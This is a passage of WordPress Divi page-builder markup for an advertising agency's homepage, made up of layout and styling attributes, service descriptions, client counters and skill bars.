_builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising Agency</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color 